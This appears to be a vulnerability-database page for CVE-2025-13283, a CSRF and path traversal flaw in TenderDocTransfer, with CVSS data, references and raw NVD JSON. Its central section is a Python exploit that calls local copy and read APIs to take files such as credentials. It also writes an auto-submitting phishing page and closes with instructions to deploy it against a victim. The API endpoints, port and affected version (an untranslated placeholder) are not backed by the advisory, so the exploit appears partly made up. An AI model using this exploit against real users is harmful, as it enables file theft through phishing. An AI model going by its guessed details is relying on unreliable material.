CVE-2025-13283

Description

TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Copy and Paste vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user's system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:cht:tenderdoctransfer:*:*:*:*:*:*:*:* - VULNERABLE

TenderDocTransfer < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import html

# CVE-2025-13283 PoC - CSRF + Path Traversal in TenderDocTransfer
# Target: TenderDocTransfer local web server
# Attack: Copy arbitrary file to attacker-controlled location

TARGET_HOST = "http://localhost:8080"  # Default TenderDocTransfer server

def generate_csrf_exploit(attacker_file_path, victim_file_path):
    """
    Generate CSRF exploit HTML that copies victim file to attacker path
    victim_file_path: Absolute path of file to copy (e.g., C:\\Users\\victim\\Documents\\config.ini)
    attacker_file_path: Absolute destination path for copied file
    """
    exploit_html = f'''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Document Transfer</title>
    </head>
    <body>
        <h1>Loading documents...</h1>
        <form id="exploit" action="{TARGET_HOST}/api/copy" method="POST" enctype="text/plain">
            <input type="hidden" name="source" value="{html.escape(victim_file_path)}">
            <input type="hidden" name="destination" value="{html.escape(attacker_file_path)}">
        </form>
        <script>
            document.getElementById('exploit').submit();
        </script>
    </body>
    </html>
    '''
    return exploit_html

def exploit_copy_api(source_file, dest_file):
    """
    Direct API call to copy file using path traversal
    """
    endpoint = f"{TARGET_HOST}/api/copy"
    payload = {
        "source": source_file,
        "destination": dest_file,
        "operation": "copy"
    }
    try:
        response = requests.post(endpoint, json=payload, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)

def exploit_read_api(file_path):
    """
    Read file content via API (information disclosure)
    """
    endpoint = f"{TARGET_HOST}/api/read"
    params = {"path": file_path}
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)

if __name__ == "__main__":
    # Example: Copy sensitive config file
    victim_file = "C:\\Users\\victim\\Documents\\credentials.txt"
    attacker_dest = "C:\\Users\\attacker\\Downloads\\stolen_credentials.txt"
    
    print("CVE-2025-13283 PoC - TenderDocTransfer Path Traversal")
    print("=" * 50)
    
    # Method 1: Direct API exploitation
    print(f"\n[+] Attempting to copy: {victim_file}")
    status, response = exploit_copy_api(victim_file, attacker_dest)
    if status == 200:
        print(f"[+] Success! File copied to: {attacker_dest}")
    else:
        print(f"[-] Failed with status {status}: {response}")
    
    # Method 2: Generate CSRF exploit for phishing
    print("\n[+] Generating CSRF exploit HTML...")
    exploit = generate_csrf_exploit(attacker_dest, victim_file)
    with open("csrf_exploit.html", "w") as f:
        f.write(exploit)
    print("[+] CSRF exploit saved to csrf_exploit.html")
    print("[+] Deploy this page on attacker server and phish victim")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13283
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13283
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13283/
[4] VulDB https://vuldb.com/cve/CVE-2025-13283
[5] https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13283", "sourceIdentifier": "[email protected]", "published": "2025-11-17T04:15:54.800", "lastModified": "2025-12-19T17:01:39.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Copy and Paste vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user's system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-36"}, {"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cht:tenderdoctransfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.41.159", "matchCriteriaId": "5E474265-3B59-4B3C-AAAD-87E8F1C7995C"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}